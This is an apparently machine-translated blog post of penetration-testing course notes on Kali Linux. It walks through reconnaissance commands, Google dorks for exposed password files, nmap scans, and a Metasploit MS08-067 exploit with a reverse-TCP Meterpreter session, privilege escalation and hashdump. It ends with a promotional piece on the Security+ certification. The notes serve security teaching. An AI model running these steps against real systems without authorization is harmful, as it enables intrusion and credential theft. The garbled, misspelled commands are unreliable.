"Safe Cow Study notes" Kali Linux penetration test method

1. Root causes of security issues

① because of layered thinking, resulting in each level of the relevant personnel are only concerned about their own level of work, so everyone knows the system is one-sided, and security is all-round, the whole, so the security problem.

② technicians pursue efficiency, leading to the pursuit of functional implementation, and easy to ignore the security of the work

③ because people can make mistakes, so the biggest security threat is people, so there is no way to avoid security hazards, but can reduce security risks

Software Security life cycle:

Demand-design---------------

Security requirements--system architecture--coding specifications--code auditing--Deployment specifications--environmental audits

Forward thinking

Reverse thinking: Penetration Testing

The significance of penetration testing:

1, Safety construction

① Cycle length

② put in big

③ effect difficult to measure

Penetration Testing:

① from the problem

② Hacker Perspective

③ High Efficiency

The goal of penetration testing: to achieve safety.

Safety Building

Protective Construction: Defensive angle, reduced attack surface, but not comprehensive defense.

Offensive security: Hackers think, attack means to detect loopholes in the system, early repair.

Linux distribution based on Debain, formerly known as Backtrack

Includes more than 600 security tools

For penetration testing and safety audits

FHS Standard directory structure

Multi-platform and mobile platform supported by arm

Open Source Free

Strategy

Root User policy (some tools require root user privileges to use)

Network Service Policy (all network services are turned off by default, all Autostart scripts are not executed, but can be performed using update rd-d)

Update upgrade strategy (System maintained by Debian, tools maintained by Kali website)

Penetration Test Standard pets ( www.pentest-standard.org)

1. Early stage of interaction: communicate with customers, determine the scope of penetration testing, etc.

For example: An application system (such as an e-commerce website), if an application is too large, it is divided into small systems

2. Intelligence gathering Stage: active information collection such as e-mail address, DNS server, such as passive information collection, port scanning, port discovery, etc.

Passive information collection: The penetration is not directly related to the target system, the target system personnel, but through the third party

Domain name (important), mailbox, person, address

–nslookup:nslookup-type=ns baidu.com 8.8.8.8

Dig:dig @8.8.8.8 baidu.com NS

Query BIND version: Dig @8.8.8.8 +noall +answer txt chaosversion.bind @dns. baidu.com

Domain transfer: Dig @dns. baidu.com AXFR

Registration information: Whois baidu.com (can search the domain name server NS record, each domain name corresponding IP address, domain name Registrant's information, registrant name, location, telephone, mailbox, etc.)

Comprehensive tools:

–fierce:fierce-dnsserver 8.8.8.8-dnsbaidu.com/usr/share/fierce.hosts.txt

/usr/share/fierce.hosts.txt is a locally supplied dictionary that will brute-force the registration information of the domain name according to the dictionary.

–dnsrecon:dnsrecon-d baidu.com-t Std--lifetime 10

-T std: Specifying the type of search

--lifetime 10: Specify the time-out period

Search engine

–shodan: (Https://www.shodan.io): Search for devices that exist on the Internet, search for information, discover vulnerabilities in them

– Google

Inurl ". Php?id"

Search Rack Camera: intitle: "Netbotz appliance" "OK"

Filetype:xls "Username|password"

Images can be viewed out of metadata, with GPS information at the time of shooting

Proprietary password dictionary (generated based on personal information)

–cupp (need to download, default is not Kali inside)

Proactive information collection

Domain name--subdomain-->IP address--usually scan the Class C address segment where the IP address is located--view open port--open service information

Examples of nmap use:

Environment: Target drone: 192.168.1.116

nmap-s$ 192.168.1.116//view open ports and corresponding services

NMAP-P21-SV 192.168.1.116//View Port service version information (see if it is the latest version, if not, whether there is a vulnerability)

Because if you want to scan more network segments and ports, it's best to use simple scripts to automate the scan

Compare valuable service port scans:

Snmp,smb,smtp,web

Identify protection mechanisms:

LBD

Wafwoof: caused by web penetration test injection failure

Fragroute

Nmap

wafwoof-l//Viewing the Wafwoof devices Wafwoof can scan

Specific Scan website: wafwoof xxxx (URL)

Scan Load Balancer Devices:

LBD www.baidu.com the

Fragroute: Detects if the target system uses some Ips,ids protective equipment tools

3. Threat Modeling Phase: Analyze information to determine the most efficient penetration attack path

Threat modeling from the point of view of the technical black box, and the results are submitted as part of the Penetration test report.

4. Vulnerability Analysis phase: Review the Server software version and other discovery vulnerabilities, write targeted vulnerability attack code

Vulnerability scanning: (only vulnerability discovery, not know how to use)

Nessus

OpenVAS

Nexpose

Nmap

Script

Analysis of known vulnerabilities inside Kali:

Known exploits exploit:

Sandi-gui

Searchsploit//To search for software for any vulnerabilities

Metaspolit Armitage: (Metaspolit graphical front end)

Example: Searchsploit vsftp

Metaspolit: (Icon of M)

MSF >use EXPLOIT/WINDOWS/SMB/MS08_067_NETAPI//Exploiting Windows XP vulnerabilities

MSF exploit (MS08_067_NETAPI) >set payload WINDOWS/METERPRETER/REVERSE_TCP//utilizes loads to allow the target host to be connected back to the attacker's host after being attacked

MSF exploit (MS08_067_NETAPI) >show Options//See what you need to set

MSF exploit (MS08_067_NETAPI) >set rhost xxxx (destination IP address)

MSF exploit (MS08_067_NETAPI) >set lhost xxxx (local IP address)

MSF exploit (MS08_067_NETAPI) >exploit (can connect to target if the target host has the vulnerability)

"Meterpreter >" appears to be connected to the target host Meterpreter >getuid view login account information Meterpreter >ps view process

Meterpreter >sysinfo Viewing System Information

Meterpreter >getpid view injected with which ID

Meterpreter >getsystem Elevation of privilege

Meterpreter >hashdump view local account and hash password

New file to save the contents of Hashdump, ready to do password cracking

Meterpreter >screenshot screenshot Target host desktop

Meterpreter >run VNC View current host Active Desktop (live interaction)

Web Scan: Nikto burpsuite owasp zap Sqlmap: For SQL injection vulnerabilities

Bursuite: Agent-truncated tool

① change agent in browser, use Bursuite proxy instead

② waits for Bursuite to truncate the client's request to the server in the browser, and then saves the truncated information to the local file

③ using Sqlmap to see if there is a SQL injection vulnerability sqlmap-r burp (file name)--dbs

5. Infiltration Attack phase: often encounter a number of protective measures, and then re-execute 2-4 steps to conduct penetration testing

6. Post-Penetration testing phase: Further infiltration attacks for more information

7. Penetration test Report: How to identify vulnerabilities, exploits, bug fixes, etc.

Project

Penetration Test Range

Get authorized

Penetration test methods

Whether social engineering is allowed

Whether to allow denial of service attacks

Scanners cannot rule out vulnerabilities at the business logic level, such as the overstepping of user rights

This note is for safe Cattle class student notes, want to see this course or information security of dry goods can go to safe cattle classes

security+ Certification Why is the Internet + era of the most popular certification?

Manifesto first introduce you to security+

security+ certification is a neutral third-party certification, the issuing agency for the United States Computer Industry Association CompTIA, and CISSP, ITIL and other common inclusion of the international IT Industry 10 Popular certification, and CISSP emphasis on information security management, compared to security+ Authentication is more emphasis on information security technology and operations.

This certification demonstrates your ability to network security, compliance and operational security, threats and vulnerabilities, application, data and Host security, access control and identity management, and encryption technology. Because of its difficult examination difficulty, the gold content is high, has been widely adopted by global enterprises and security professionals.

Why is security+ certification so hot?

Reason one: In all information security certification, the emphasis on information security technology certification is blank, security+ certification just can make up for information security technology field blank.

Currently recognized in the industry of information security certification mainly have Cisp and CISSP, but whether cisp or CISSP are emphasis on information security management, technical knowledge is broad and simple, the exam is around. And CISSP require a certificate of information security work experience for more than 5 years, Cisp also require a college education 4 years of working experience, these requirements will undoubtedly be able and motivated young people of the road blocked. In the real world, whether it is looking for a job or a raise, or a tender time to report personnel, certification is essential, which brings a lot of injustice to young people. The emergence of security+ can clear these young people career development obstacles, because security+ emphasis on information security technology, so there is no special requirements for work experience. As long as you have an IT-related background, the pursuit of progress can be studied and tested.

Reason two: it operation and maintenance personnel work and turn over the weapon.

In the banking, securities, insurance, information and communications industries, IT operations personnel are very many, it operations involved in the face is also very wide. is a network, system, security, application architecture, storage as one integrated technology post. Although no program ape "born as a Bachelor, Die also write code," The solemn and tragic, but also has "Hoe wo Day Copse, as the operation of suffering" feeling. Every day to the computer and machine, the time has been inevitable for career development confusion and confusion. The advent of security+ international certification allows the pursuit of IT operations personnel to learn network security knowledge, to master network security practices. Career development in the direction of network security, to solve the problem of the shortage of information security personnel in China. In addition, even if not transformation, to do a good job in operation and maintenance, learning safety knowledge to obtain safety certification is also essential.

Reason three: grounding gas, international stylish, easy to test, moderate cost!

As the most influential global leader in the global ICT sector, CompTIA is professional, fair and impartial in the field of information security talent certification. Security+ certification is highly operational and closely related to the daily work of frontline engineers. Suitable for banks, securities, insurance, internet companies and other IT-related personnel learning. As an international certification in 147 countries around the world are widely recognized.

Under the current tide of information security, talent is the key to the development of information security. and the current domestic information security personnel is very scarce, I believe security+ certification will become the most popular information security certification

This article is from the "11662938" blog, please be sure to keep this source http://11672938.blog.51cto.com/11662938/1980330

"Safe Cow Study notes" Kali Linux penetration test method